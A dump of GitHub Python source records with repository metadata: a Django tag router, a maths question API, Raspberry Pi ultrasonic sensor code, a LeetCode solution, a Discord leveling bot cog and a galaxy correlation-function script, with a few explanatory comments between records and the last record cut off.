{"seq_id":"10310779312","text":"from django.urls import include, path\nfrom rest_framework.routers import DefaultRouter\n\nfrom .views import TagViewSet\n\nrouter_v1 = DefaultRouter()\nrouter_v1.register(\n    'tags',\n    TagViewSet,\n    basename='tags'\n)\n\nurlpatterns = [\n    path('', include(router_v1.urls)),\n]\n","repo_name":"YourKeysAreMine/foodgram-project-react","sub_path":"backend/tags/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"25794093741","text":"import sys\nimport os\n\n\ncur_dir = os.path.split(os.path.abspath(__file__))[0]\nparent_dir = os.path.split(os.path.abspath(cur_dir))[0]\ngrandparent_dir = os.path.split(os.path.abspath(parent_dir))[0]\nquestions_dir = os.path.join(parent_dir, 'questions')\nsys.path.append(grandparent_dir)\n\n\nfrom maths.questions import relationships\nimport glob\nimport importlib\nimport random\n\n\n\ndef get_questions_dir():\n    \"\"\"Return the directory that houses the questions.\n    \"\"\"\n\n    relationships_path = os.path.abspath(relationships.__file__)\n    return os.path.split(relationships_path)[0]\n\n\ndef get_question_paths(questions_dir):\n    \"\"\"Get all the module paths that have questions in them.\n    \"\"\"\n\n    pattern = os.path.join(questions_dir, r'*.py')\n\n    module_paths = glob.glob(pattern)\n\n    non_question_modules = ['__init__.py', 'relationships.py']\n\n    question_modules = []\n    for module_path in module_paths:\n        module_name = os.path.split(module_path)[1]\n\n        if module_name not in non_question_modules:\n            question_modules.append(module_path)\n\n    return question_modules\n\n\ndef import_question_modules(question_paths):\n    \"\"\"Import and return a list of imported question modules.\n    \"\"\"\n\n    question_modules = []\n\n    for question_path in question_paths:\n        relative_path = os.path.relpath(question_path)\n        module_name = os.path.splitext(os.path.split(relative_path)[1])[0]\n\n        imported_module = importlib.import_module('.' + module_name, package='maths.questions')\n\n        if hasattr(imported_module, 'question_not_complete'):\n            continue\n\n        question_modules.append(imported_module)\n\n    return question_modules\n\n\ndef random_question():\n    \"\"\"Serve a random question along with its solution.\n    \"\"\"\n\n    questions_dir = get_questions_dir()\n    question_paths = get_question_paths(questions_dir)\n    question_modules = import_question_modules(question_paths)\n\n    choice = random.choice(question_modules)\n    built_question = relationships.parse_structure(choice)[0]\n\n    return {\n        'question': built_question.question_statement(),\n        'solution': built_question.solution_statement()\n    }\n","repo_name":"nebffa/MathsExams","sub_path":"maths/api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"}
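import_question_modules above leans on importlib's relative-import form: a module name starting with '.' is resolved against the package argument rather than against sys.path order. A minimal self-contained equivalent (the plugin name below is hypothetical):

import importlib

def load_question_module(name: str, package: str = "maths.questions"):
    # '.' + name makes this a relative import inside `package`
    return importlib.import_module("." + name, package=package)

# load_question_module("simple_diff") would import maths.questions.simple_diff,
# assuming such a module exists in the package.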
{"seq_id":"19319825890","text":"import RPi.GPIO as gpio\nfrom time import clock\nfrom threading import Thread\nfrom src import util\n\n# distance (in meters, technically) to use when no object is seen. This \n# should be outside the range in which the walker reacts in any way\nREALLY_FAR_AWAY = 49.69\n\nclass UltrasonicSensor: \n    #Constructor Parameters:\n    # * trigger_pin - number for the GPIO pin connected to TRIG on the sensor\n    # * echo_pin - number for the GPIO pin connected to ECHO on the sensor\n    # * offset - distance from sensor when walker hits an obstacle\n    # \t^ can be zero\n    # * max_dist - ignores objects farther than this (after offset applied)\n    # * min_blip_freq - beep tempo at farthest distance\n    # * max_blip_freq - beep tempo at nearest distance\n    #Other variables stored:\n    # * distance - most recent measurement (in meters)\n    # * timeout - time after which CANE should stop listening for US echo\n    \n    def __init__(self, trigger_pin, echo_pin, offset, max_dist, \n            min_blip_freq, max_blip_freq):\n        self.echo = echo_pin\n        self.trigger = trigger_pin\n        self.distance = 0 # should be >= 0\n        self.dist_offset = offset\n        self.dist_max = max_dist\n        self.max_freq = max_blip_freq\n        self.min_freq = min_blip_freq\n        self.timeout = meters_to_seconds(10.0) #upper range 1m-4.5m, depending\n        gpio.setmode(gpio.BCM)\n        gpio.setup(self.trigger, gpio.OUT)\n        gpio.setup(self.echo, gpio.IN, pull_up_down=gpio.PUD_DOWN)\n\n    # send pulse to sensor's TRIG pin, starting the measurement process\n    def ping(self):\n        gpio.output(self.trigger, gpio.LOW)\n        micros_wait(10)\n        gpio.output(self.trigger, gpio.HIGH)\n        micros_wait(10)\n        gpio.output(self.trigger, gpio.LOW)\n    \n    # update the sensor's distance variable (see resources directory for \n    # technical info)\n    def find_distance(self):\n        echo_time = self.measure_echo_pulse()\n        \n        self.distance = self.convert_time_to_distance(echo_time)\n        \"\"\"util.log(str(self.echo)+' went high after '+str(wait_time)\n                + ' with loop count '+str(wait_count)\n                + '; measured time '+str(echo_time)+' with loop count '\n                + str(echo_count)+'; raw distance '+str(self.distance)\n                )\"\"\"\n    \n    # Measure the length of the echo pulse and return it, in seconds.\n    def measure_echo_pulse(self):\n        echo_time = 0.0 # Length of time, in seconds.\n\n        # wait until the echo pin goes high\n        # Multiply by 1000 to convert seconds to milliseconds.\n        # TODO determine timeout outside of wait_for_edge\n        error = gpio.wait_for_edge(self.echo, gpio.RISING, \n                                   timeout=int(self.timeout*1000))\n        \n        startTime = clock()\n\n        # wait until the echo pin goes low, storing the elapsed time\n        error = gpio.wait_for_edge(self.echo, gpio.FALLING, \n                                   timeout=int(self.timeout*1000))\n        \n        endTime = clock()\n\n        # Calculate elapsed time.\n        echo_time = endTime - startTime\n\n        return echo_time\n\n    # Convert the provided time (in seconds) to an output distance (in meters).\n    def convert_time_to_distance(self, input_time):\n        distance = 0.0 # Distance in meters\n\n        # convert time to meters and adjust for offset\n        distance = seconds_to_meters(input_time) - self.dist_offset\n        if distance < 0.0: \n            # found something but it's less than the minimum distance\n            distance = 0.0\n\n        return distance\n\n    # return a new thread which runs find_distance()\n    def get_distance_thread(self):\n        return Thread(target=UltrasonicSensor.find_distance, args=(self,))\n    \n    # get the frequency at which the UI beeps should occur for this sensor\n    def blips_freq(self):\n        if self.distance < self.dist_max:\n            return (self.max_freq - (self.max_freq - self.min_freq) \n                    / self.dist_max * self.distance)\n        else:\n            return 0.001\n\n\n\n# def micros_to_cm(micros):\n    # return micros / 58.82\ndef seconds_to_meters(seconds):\n\treturn seconds * 170.145\ndef meters_to_seconds(meters):\n\treturn meters / 170.145\n\n# time.sleep() only works with input > 1 ms. This is inelegant, but works with\n# the full accuracy of the operating system. Only use when time.sleep()\n# would be insufficient\ndef micros_wait(t):\n    tEnd = clock() + t * 10**-6\n    while clock() < tEnd:\n        pass\n    return\n\n# run a function repeatedly until it returns true, then return the time\n# it took to reach that state. If max_time (in seconds) is exceeded first,\n# return -1 instead.\ndef time_check( return_checker, max_time ):\n    tStart = clock()\n    tTimeout = tStart + max_time\n    complete = False\n    while not complete:\n        complete = return_checker()\n        if clock() >= tTimeout: \n            return -1\n    #print('sensor time', time() - tStart)\n    return clock() - tStart\n    \n","repo_name":"Robot-X-4969/CANE-walker","sub_path":"src/ultrasonic.py","file_name":"ultrasonic.py","file_ext":"py","file_size_in_byte":4928,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"}
{"seq_id":"31586820520","text":"#link to problem: https://leetcode.com/problems/maximum-subarray/\n\ndef maxSubArray(nums):\n    for x in range(1,len(nums)):\n        if nums[x-1] > 0:\n            nums[x] += nums[x-1]\n    return max(nums)\n\nprint(maxSubArray([4,-1,2,1])) #6\nprint(maxSubArray([1])) #1\nprint(maxSubArray([5,4,-1,7,8])) #23\n","repo_name":"GoGitThat/leetcodeProblems","sub_path":"easy/maximumSubarray.py","file_name":"maximumSubarray.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"13956937122","text":"import asyncio\nimport random\nfrom math import floor\nfrom typing import Optional\n\nimport aiosqlite\nimport discord\nfrom discord import app_commands\nfrom discord.ext import commands\n\nimport utils\nfrom utils.ids import GuildIDs, GuildNames, TGChannelIDs, TGLevelRoleIDs\nfrom utils.image import get_dominant_colour\n\n\nclass Levels(commands.Cog):\n    \"\"\"This class handles the Leveling System of the Bot.\n    We used to use Mee6, but now we use a custom system.\n    \"\"\"\n\n    def __init__(self, bot: commands.Bot) -> None:\n        self.bot = bot\n\n    def get_xp_till_next_level(self, current_level: int, current_xp: int) -> int:\n        \"\"\"Gets you the amount of XP you need to level up to the next level.\n        Taken from: https://github.com/Mee6/Mee6-documentation/blob/master/docs/levels_xp.md\n        Since we used to use Mee6, we decided to keep the same formula.\n        \"\"\"\n        return max(\n            5 * 
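        # Editor's note: this is Mee6's published curve (see the doc link above). XP to go
        # from level L to L+1 is 5*L**2 + 50*L + 100, so level 0 -> 1 costs 100 XP,
        # level 10 -> 11 costs 5*100 + 500 + 100 = 1100 XP, and reaching level 10 from
        # scratch takes sum(5*i*i + 50*i + 100 for i in range(10)) = 4675 XP in total.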
(current_level**2) + (50 * current_level) + 100 - current_xp, 0\n )\n\n def get_xp_for_level(self, level: int) -> int:\n \"\"\"Gets you the amount of XP you need to reach a certain level.\"\"\"\n if level < 0:\n return 0\n\n return sum(self.get_xp_till_next_level(i, 0) for i in range(level))\n\n def get_level_from_xp(self, xp: int) -> int:\n \"\"\"Gets you the level you are at from a certain amount of XP.\"\"\"\n level = 0\n while self.get_xp_for_level(level) <= xp:\n level += 1\n return max(level - 1, 0)\n\n async def create_new_profile(self, user: discord.User) -> None:\n \"\"\"Creates a profile for a user.\"\"\"\n async with aiosqlite.connect(\"./db/database.db\") as db:\n matching_profile = await db.execute_fetchall(\n \"\"\"SELECT * FROM level WHERE id = :id\"\"\",\n {\"id\": user.id},\n )\n\n if len(matching_profile) != 0:\n return\n\n await db.execute(\n \"\"\"INSERT INTO level VALUES (:id, :level, :xp, :messages)\"\"\",\n {\n \"id\": user.id,\n \"level\": 0,\n \"xp\": 0,\n \"messages\": 0,\n },\n )\n await db.commit()\n\n async def add_xp(self, user_id: int, xp_gained: int) -> tuple[int, int, int]:\n \"\"\"Adds XP to a user and returns the old level, new level and new XP.\"\"\"\n async with aiosqlite.connect(\"./db/database.db\") as db:\n matching_profile = await db.execute_fetchall(\n \"\"\"SELECT * FROM level WHERE id = :id\"\"\",\n {\"id\": user_id},\n )\n\n old_level = matching_profile[0][1]\n old_xp = matching_profile[0][2]\n\n new_xp = old_xp + xp_gained\n new_level = self.get_level_from_xp(new_xp)\n\n await db.execute(\n \"\"\"UPDATE level SET xp = :new_xp, messages = messages + 1, level = :new_level WHERE id = :id\"\"\",\n {\n \"new_xp\": new_xp,\n \"new_level\": new_level,\n \"id\": user_id,\n },\n )\n\n await db.commit()\n\n return (old_level, new_level, new_xp)\n\n def get_all_level_roles(self, guild: discord.Guild) -> list[discord.Role]:\n defaultrole = discord.utils.get(guild.roles, id=TGLevelRoleIDs.RECRUIT_ROLE)\n level10 = discord.utils.get(guild.roles, id=TGLevelRoleIDs.LEVEL_10_ROLE)\n level25 = discord.utils.get(guild.roles, id=TGLevelRoleIDs.LEVEL_25_ROLE)\n level50 = discord.utils.get(guild.roles, id=TGLevelRoleIDs.LEVEL_50_ROLE)\n level75 = discord.utils.get(guild.roles, id=TGLevelRoleIDs.LEVEL_75_ROLE)\n level100 = discord.utils.get(guild.roles, id=TGLevelRoleIDs.LEVEL_100_ROLE)\n\n return [defaultrole, level10, level25, level50, level75, level100]\n\n async def assign_level_role(\n self,\n member: discord.Member,\n levelroles: list[discord.Role],\n assign_role: discord.Role,\n ) -> discord.Role:\n \"\"\"Removes every other level role and assigns the correct one.\"\"\"\n\n roles_to_remove = [role for role in levelroles if role is not assign_role]\n await member.remove_roles(*roles_to_remove)\n await member.add_roles(assign_role)\n return assign_role\n\n async def update_level_role(\n self, user: discord.User, level: int, guild: discord.Guild\n ) -> Optional[discord.Role]:\n \"\"\"Assigns you a new role depending on your level and removes all of the other ones.\n Returns the new role.\n \"\"\"\n rolegiven = None\n\n levelroles = self.get_all_level_roles(guild)\n\n [defaultrole, level10, level25, level50, level75, level100] = levelroles\n\n try:\n member = await guild.fetch_member(user.id)\n except discord.NotFound:\n return\n\n if level >= 100:\n if level100 not in member.roles:\n rolegiven = await self.assign_level_role(member, levelroles, level100)\n\n elif level >= 75:\n if level75 not in member.roles:\n rolegiven = await self.assign_level_role(member, 
levelroles, level75)\n\n elif level >= 50:\n if level50 not in member.roles:\n rolegiven = await self.assign_level_role(member, levelroles, level50)\n\n elif level >= 25:\n if level25 not in member.roles:\n rolegiven = await self.assign_level_role(member, levelroles, level25)\n\n elif level >= 10:\n if level10 not in member.roles:\n rolegiven = await self.assign_level_role(member, levelroles, level10)\n\n else:\n if defaultrole not in member.roles:\n rolegiven = await self.assign_level_role(\n member, levelroles, defaultrole\n )\n\n return rolegiven\n\n def get_next_role(\n self, current_xp: int, current_level: int, guild: discord.Guild\n ) -> tuple[int, int, Optional[discord.Role]]:\n \"\"\"Gets you the next role, if there is any, plus the levels and XP needed to get there.\"\"\"\n levelroles = self.get_all_level_roles(guild)\n\n [_, level10, level25, level50, level75, level100] = levelroles\n\n if current_level >= 100:\n return (0, 0, None)\n\n if current_level >= 75:\n return (\n 100 - current_level,\n self.get_xp_for_level(100),\n level100,\n )\n\n if current_level >= 50:\n return (75 - current_level, self.get_xp_for_level(75), level75)\n\n if current_level >= 25:\n return (50 - current_level, self.get_xp_for_level(50), level50)\n\n if current_level >= 10:\n return (25 - current_level, self.get_xp_for_level(25), level25)\n\n return (10 - current_level, self.get_xp_for_level(10), level10)\n\n @commands.Cog.listener()\n async def on_message(self, message: discord.Message) -> None:\n if message.author.bot:\n return\n\n if not message.guild:\n return\n\n if message.guild.id != GuildIDs.TRAINING_GROUNDS:\n return\n\n if message.channel.id in TGChannelIDs.BLACKLISTED_CHANNELS:\n return\n\n if self.bot.recent_messages.get(message.author.id) is not None:\n return\n\n if message.is_system():\n return\n\n # Doesn't really matter what we set it to, as long as it's not None.\n self.bot.recent_messages[message.author.id] = True\n\n xp_amount = random.randint(15, 25)\n\n await self.create_new_profile(message.author)\n\n (old_level, new_level, _) = await self.add_xp(message.author.id, xp_amount)\n\n if old_level != new_level:\n role = await self.update_level_role(\n message.author, new_level, message.guild\n )\n\n if role:\n sent_message = f\"Congrats {message.author.mention}! You leveled up to level {new_level}! You gained the {role.name} role!\"\n else:\n sent_message = f\"Congrats {message.author.mention}! 
You leveled up to level {new_level}!\"\n\n await message.channel.send(sent_message)\n\n # We wait 30 seconds before removing the user from the recent_messages dict.\n # This is to prevent the user from spamming messages and getting a lot of xp.\n # Maybe replace this with a loop that runs every X seconds and removes all users from the dict?\n await asyncio.sleep(30)\n\n try:\n self.bot.recent_messages.pop(message.author.id)\n except KeyError:\n pass\n\n @commands.hybrid_group()\n @app_commands.guilds(*GuildIDs.ALL_GUILDS)\n @app_commands.default_permissions(administrator=True)\n @utils.check.is_moderator()\n async def xp(self, ctx: commands.Context):\n \"\"\"Lists the xp commands.\"\"\"\n if ctx.invoked_subcommand:\n return\n\n embed = discord.Embed(\n title=\"Available subcommands:\",\n description=f\"`{ctx.prefix}xp add @user <amount>`\\n\"\n f\"`{ctx.prefix}xp remove @user <amount>`\\n\",\n colour=self.bot.colour,\n )\n embed.set_thumbnail(url=self.bot.user.display_avatar.url)\n await ctx.send(embed=embed)\n\n @xp.command(name=\"add\")\n @app_commands.guilds(*GuildIDs.ALL_GUILDS)\n @app_commands.describe(\n user=\"The user to add the xp to.\", amount=\"The amount of xp to add to the user.\"\n )\n @app_commands.default_permissions(administrator=True)\n @utils.check.is_moderator()\n async def xp_add(\n self, ctx: commands.Context, user: discord.User, amount: int\n ) -> None:\n \"\"\"Adds xp to a user.\"\"\"\n\n if amount < 0:\n await ctx.send(\"To remove XP, please use the xp remove command.\")\n return\n\n await self.create_new_profile(user)\n\n (old_level, new_level, new_xp) = await self.add_xp(user.id, amount)\n\n if old_level != new_level:\n await self.update_level_role(user, new_level, ctx.guild)\n\n await ctx.send(\n f\"Added {amount}XP to {user.mention}. They are now level {new_level} with {new_xp}XP.\"\n )\n\n @xp.command(name=\"remove\")\n @app_commands.guilds(*GuildIDs.ALL_GUILDS)\n @app_commands.describe(\n user=\"The user to remove the xp from.\",\n amount=\"The amount of xp to remove from the user.\",\n )\n @app_commands.default_permissions(administrator=True)\n @utils.check.is_moderator()\n async def xp_remove(\n self, ctx: commands.Context, user: discord.User, amount: int\n ) -> None:\n \"\"\"Removes xp from a user.\"\"\"\n\n if amount < 0:\n await ctx.send(\"To add XP, please use the xp add command.\")\n return\n\n await self.create_new_profile(user)\n\n (old_level, new_level, new_xp) = await self.add_xp(user.id, -amount)\n\n if old_level != new_level:\n await self.update_level_role(user, new_level, ctx.guild)\n\n await ctx.send(\n f\"Removed {amount}XP from {user.mention}. 
They are now level {new_level} with {new_xp}XP.\"\n )\n\n @commands.hybrid_command()\n @app_commands.guilds(*GuildIDs.ALL_GUILDS)\n async def rank(self, ctx: commands.Context, user: discord.User = None) -> None:\n \"\"\"Shows your level and xp, or the level and xp of another user.\"\"\"\n if user is None:\n user = ctx.author\n\n if user.bot:\n await ctx.send(\"This command cannot be used on bots.\")\n return\n\n if not ctx.guild:\n await ctx.send(\n f\"This command can only be used in the {GuildNames.TRAINING_GROUNDS}\"\n )\n return\n\n if ctx.guild.id != GuildIDs.TRAINING_GROUNDS:\n await ctx.send(\n f\"This command can only be used in the {GuildNames.TRAINING_GROUNDS}\"\n )\n return\n\n await ctx.typing()\n\n colour = await get_dominant_colour(user.display_avatar)\n\n embed = discord.Embed(\n title=f\"Level statistics for {str(user)}\",\n colour=colour,\n )\n\n await self.create_new_profile(user)\n\n async with aiosqlite.connect(\"./db/database.db\") as db:\n matching_profile = await db.execute_fetchall(\n \"\"\"SELECT * FROM level WHERE id = :id\"\"\",\n {\"id\": user.id},\n )\n\n level = matching_profile[0][1]\n xp = matching_profile[0][2]\n messages = matching_profile[0][3]\n\n leaderboard_rank = await db.execute_fetchall(\n \"\"\"SELECT row_number() OVER (ORDER BY xp DESC) AS rank, id, level, xp, messages FROM level\"\"\",\n )\n rank = next((i[0] for i in leaderboard_rank if i[1] == user.id), 0)\n next_user = next((i for i in leaderboard_rank if i[0] == rank + 1), None)\n prev_user = next((i for i in leaderboard_rank if i[0] == rank - 1), None)\n\n await db.commit()\n\n xp_progress = xp - self.get_xp_for_level(level)\n xp_needed = self.get_xp_for_level(level + 1) - self.get_xp_for_level(level)\n\n [next_role_level, next_role_xp, next_role] = self.get_next_role(\n xp, level, ctx.guild\n )\n\n percent_next = round((xp_progress / xp_needed) * 100, 2)\n # I wanted to do this with 20 characters, but it cuts off on mobile at 17.\n progress_bar_next = (\"█\" * floor(percent_next / 6.25)).ljust(16, \"░\")\n\n percent_level = round((xp / next_role_xp) * 100, 2)\n progress_bar_level = (\"█\" * floor(percent_level / 6.25)).ljust(16, \"░\")\n\n embed.add_field(name=\"Level\", value=f\"**{level}**\", inline=True)\n embed.add_field(\n name=\"Rank\",\n value=f\"**#{rank}**\",\n inline=True,\n )\n embed.add_field(name=\"XP\", value=f\"**{xp:,}**\", inline=True)\n embed.add_field(\n name=\"Progress to next level\",\n value=f\"{xp_progress:,}XP/{xp_needed:,}XP *({percent_next}%)*\\n{progress_bar_next}\",\n inline=False,\n )\n if next_role:\n embed.add_field(\n name=\"Progress to next role\",\n value=f\"{next_role.mention} *({next_role_level} Level needed)*\\n\"\n f\"{xp:,}XP/{next_role_xp:,}XP *({percent_level}%)*\\n{progress_bar_level}\",\n inline=False,\n )\n else:\n embed.add_field(\n name=\"Progress to next role\",\n value=\"No more roles to unlock!\",\n inline=False,\n )\n\n if prev_user is not None:\n prev_member = self.bot.get_user(prev_user[1])\n if prev_member is None:\n try:\n prev_member = await self.bot.fetch_user(prev_user[1])\n except (discord.NotFound, discord.HTTPException):\n prev_member = \"Unknown User\"\n\n embed.add_field(\n name=\"User above\",\n value=f\"**{str(prev_member)}** - Level {prev_user[2]} *({prev_user[3]:,}XP)*\\n{(prev_user[3] - xp):,}XP behind\",\n inline=False,\n )\n\n if next_user is not None:\n next_member = self.bot.get_user(next_user[1])\n if next_member is None:\n try:\n next_member = await self.bot.fetch_user(next_user[1])\n except (discord.NotFound, 
discord.HTTPException):\n next_member = \"Unknown User\"\n\n embed.add_field(\n name=\"User below\",\n value=f\"**{str(next_member)}** - Level {next_user[2]} *({next_user[3]:,}XP)*\\n{(xp - next_user[3]):,}XP ahead\",\n inline=False,\n )\n\n embed.add_field(\n name=\"Messages sent\",\n value=f\"{messages:,}\",\n inline=False,\n )\n\n embed.set_thumbnail(url=user.display_avatar.url)\n await ctx.send(embed=embed)\n\n @commands.hybrid_command()\n @app_commands.guilds(*GuildIDs.ALL_GUILDS)\n async def levels(self, ctx: commands.Context) -> None:\n \"\"\"Shows the leaderboard for levels.\"\"\"\n\n if not ctx.guild:\n await ctx.send(\n f\"This command can only be used in the {GuildNames.TRAINING_GROUNDS}\"\n )\n return\n\n if ctx.guild.id != GuildIDs.TRAINING_GROUNDS:\n await ctx.send(\n f\"This command can only be used in the {GuildNames.TRAINING_GROUNDS}\"\n )\n return\n\n await ctx.typing()\n\n embed = discord.Embed(\n title=f\"Level leaderboard of {GuildNames.TRAINING_GROUNDS}\",\n colour=self.bot.colour,\n )\n\n async with aiosqlite.connect(\"./db/database.db\") as db:\n leaderboard = await db.execute_fetchall(\n \"\"\"SELECT row_number() OVER (ORDER BY xp DESC) AS rank, id, level, xp, messages FROM level\"\"\",\n )\n\n total_messages = await db.execute_fetchall(\n \"\"\"SELECT SUM(messages) FROM level\"\"\",\n )\n\n total_xp = await db.execute_fetchall(\n \"\"\"SELECT SUM(xp) FROM level\"\"\",\n )\n\n await db.commit()\n\n for rank, user_id, level, xp, messages in leaderboard[:25]:\n user = self.bot.get_user(user_id)\n if user is None:\n user = await self.bot.fetch_user(user_id)\n\n embed.add_field(\n name=f\"#{rank} - {str(user)}\",\n value=f\"Level {level} - {xp:,}XP ({messages:,} messages)\",\n inline=False,\n )\n\n embed.set_footer(\n text=f\"Total server stats: {total_xp[0][0]:,}XP - {total_messages[0][0]:,} messages\",\n )\n\n embed.set_thumbnail(url=ctx.guild.icon.url)\n\n await ctx.send(embed=embed)\n\n @xp_add.error\n async def xp_add_error(\n self, ctx: commands.Context, error: commands.CommandError\n ) -> None:\n if isinstance(error, commands.BadArgument):\n await ctx.send(\"Please provide a valid amount of XP to add.\")\n\n @xp_remove.error\n async def xp_remove_error(\n self, ctx: commands.Context, error: commands.CommandError\n ) -> None:\n if isinstance(error, commands.BadArgument):\n await ctx.send(\"Please provide a valid amount of XP to remove.\")\n\n\nasync def setup(bot: commands.Bot) -> None:\n await bot.add_cog(Levels(bot))\n print(\"Levels cog loaded\")\n","repo_name":"SSBUTrainingGrounds/Tabuu-3.0","sub_path":"cogs/levels.py","file_name":"levels.py","file_ext":"py","file_size_in_byte":18443,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"16978952982","text":"## Script to compute estimate of the correlation function(s) xi(r,mu) for an entire survey via the DD/RR-1 estimator for one/two sets of tracer particles (galaxies).\n## This assumes a periodic simulation, with the random RR counts computed analytically.\n## Mu (RSD angle) is measured from the Z-axis.\n## If two sets of galaxies are provided, the code will automatically compute xi_11 xi_12 and xi_22, else only xi_11 will be computed.\n\nimport sys\nimport numpy as np\n\n# PARAMETERS\nif len(sys.argv)!=8:\n if len(sys.argv)!=9:\n print(\"Usage: python xi_estimator_periodic.py {GALAXY_FILE} {RADIAL_BIN_FILE} {BOXSIZE} {MU_MAX} {N_MU_BINS} {NTHREADS} {OUTPUT_DIR} [{GALAXY_FILE_2}]\")\n sys.exit(1)\nDname = str(sys.argv[1])\nbinfile = 
str(sys.argv[2])\nboxsize = float(sys.argv[3])\nmu_max = float(sys.argv[4])\nnmu_bins = int(sys.argv[5])\nnthreads = int(sys.argv[6])\noutdir=str(sys.argv[7])\n\nif len(sys.argv)==9:\n multifield = True\n Dname2 = str(sys.argv[8])\nelse:\n multifield = False\n\n## First read in weights and positions:\ndtype = np.double\n\nprint(\"Counting lines in galaxy file\")\ntotal_lines=0\nfor n, line in enumerate(open(Dname, 'r')):\n total_lines+=1\n\ndX,dY,dZ,dW=[np.zeros(total_lines) for _ in range(4)]\n\nprint(\"Reading in galaxy data\");\nfor n, line in enumerate(open(Dname, 'r')):\n if n%1000000==0:\n print(\"Reading line %d of %d\" %(n,total_lines))\n split_line=np.array(line.split(), dtype=float)\n dX[n]=split_line[0];\n dY[n]=split_line[1];\n dZ[n]=split_line[2];\n if len(split_line)>3:\n dW[n]=split_line[3];\n else:\n dW[n]=1.\n\nN_gal = len(dX) # number of particles\n\nprint(\"Number of galaxy particles: %.1e\"%N_gal)\n\n## Check for periodicity\nxrange = max(dX)-min(dX)\nyrange = max(dY)-min(dY)\nzrange = max(dZ)-min(dZ)\n\nassert(np.abs(xrange-boxsize)/boxsize<0.001),'Data is not periodic! X-range is %.2e compared to boxsize %.2e'%(xrange,boxsize)\nassert(np.abs(yrange-boxsize)/boxsize<0.001),'Data is not periodic! Y-range is %.2e compared to boxsize %.2e'%(yrange,boxsize)\nassert(np.abs(zrange-boxsize)/boxsize<0.001),'Data is not periodic! Z-range is %.2e compared to boxsize %.2e'%(zrange,boxsize)\n\nif multifield:\n\n print(\"Counting lines in galaxy file 2\")\n total_lines2=0\n for n, line in enumerate(open(Dname2,'r')):\n total_lines2+=1\n\n dX2,dY2,dZ2,dW2=[np.zeros(total_lines2) for _ in range(4)]\n\n print(\"Reading in galaxy data for galaxy 2\");\n for n, line in enumerate(open(Dname2, 'r')):\n if n%1000000==0:\n print(\"Reading line %d of %d\" %(n,total_lines2))\n split_line=np.array(line.split(), dtype=float)\n dX2[n]=split_line[0];\n dY2[n]=split_line[1];\n dZ2[n]=split_line[2];\n dW2[n]=split_line[3];\n\n N_gal2 = len(dX2) # number of particles\n print(\"Number of galaxy particles in second set: %.1e\"%N_gal2)\n\n ## Check for periodicity\n xrange = max(dX2)-min(dX2)\n yrange = max(dY2)-min(dY2)\n zrange = max(dZ2)-min(dZ2)\n\n assert(np.abs(xrange-boxsize)/boxsize<0.001),'Data set 2 is not periodic! X-range is %.2e compared to boxsize %.2e'%(xrange,boxsize)\n assert(np.abs(yrange-boxsize)/boxsize<0.001),'Data set 2 is not periodic! Y-range is %.2e compared to boxsize %.2e'%(yrange,boxsize)\n assert(np.abs(zrange-boxsize)/boxsize<0.001),'Data set 2 is not periodic! Z-range is %.2e compared to boxsize %.2e'%(zrange,boxsize)\n\n## Determine number of radial bins in binning file:\nprint(\"Counting lines in binfile\");\nwith open(binfile) as f:\n for i, l in enumerate(f):\n pass\nnrbins = i + 1\nall_bins = np.loadtxt(binfile)\nmean_bins=0.5*(all_bins[:,0]+all_bins[:,1])\nif all_bins[0,0]>2:\n raise Exception(\"Radial binfile should extend close to zero\")\nprint('%s radial bins are used in this file.' 
%nrbins)\n\nprint("Using periodic input data");\nfrom Corrfunc.theory.DDsmu import DDsmu\n\n# Compute RR counts analytically\nRR_counts = 4.*np.pi/3.*(all_bins[:,1]**3-all_bins[:,0]**3)/boxsize**3*mu_max/nmu_bins\n\nimport time\ninit = time.time()\n\n# Now compute DD counts\nprint("Computing DD pair counts")\ntmpDD=DDsmu(1,nthreads,binfile,mu_max,nmu_bins,dX,dY,dZ,weights1=dW,weight_type='pair_product',verbose=True,periodic=True)\nDD_counts = tmpDD[:]['npairs']*tmpDD[:]['weightavg']\nDD_counts/=np.sum(dW)**2.\nprint("Finished after %d seconds"%(time.time()-init))\n\n# Now use CF estimator:\nxi_reshape = DD_counts.reshape(nrbins,nmu_bins)/RR_counts.reshape(nrbins,1) - 1.\n\nif multifield:\n # Compute cross fields\n init = time.time()\n print("Computing DD pair counts for cross pair counts")\n tmpDD12=DDsmu(0,nthreads,binfile,mu_max,nmu_bins,dX,dY,dZ,weights1=dW,weight_type='pair_product',\n X2=dX2,Y2=dY2,Z2=dZ2,weights2=dW2,\n verbose=True,periodic=True)\n DD12_counts = tmpDD12[:]['npairs']*tmpDD12[:]['weightavg']\n DD12_counts/=np.sum(dW)*np.sum(dW2)\n print("Finished after %d seconds"%(time.time()-init))\n\n xi_reshape12 = DD12_counts.reshape(nrbins,nmu_bins)/RR_counts.reshape(nrbins,1)-1.\n\n # Compute second field pair counts\n init = time.time()\n print("Computing DD pair counts for second dataset")\n tmpDD2=DDsmu(1,nthreads,binfile,mu_max,nmu_bins,dX2,dY2,dZ2,weights1=dW2,weight_type='pair_product',\n verbose=True,periodic=True)\n DD2_counts = tmpDD2[:]['npairs']*tmpDD2[:]['weightavg']\n DD2_counts/=np.sum(dW2)**2.\n print("Finished after %d seconds"%(time.time()-init))\n\n xi_reshape2 = DD2_counts.reshape(nrbins,nmu_bins)/RR_counts.reshape(nrbins,1)-1.\n\n# Save output files:\nimport os\nif not os.path.exists(outdir):\n os.makedirs(outdir)\n\n# Define mu centers\nmean_mus = np.linspace(0.5/nmu_bins,1-0.5/nmu_bins,nmu_bins)\n\noutname='xi_n%d_m%d_periodic_11.dat'%(nrbins,nmu_bins)\nprint("Saving correlation function(s)")\nwith open(os.path.join(outdir, outname), "w+") as outfile:\n for r in mean_bins:\n outfile.write("%.8e "%r)\n outfile.write("\\n")\n for mu in mean_mus:\n outfile.write("%.8e "%mu)\n outfile.write("\\n");\n for i in range(nrbins):\n for j in range(nmu_bins):\n outfile.write("%.8e "%xi_reshape[i,j])\n outfile.write("\\n")\n\nprint("Correlation function written successfully to %s"%(outdir+outname))\n\nif multifield:\n\n 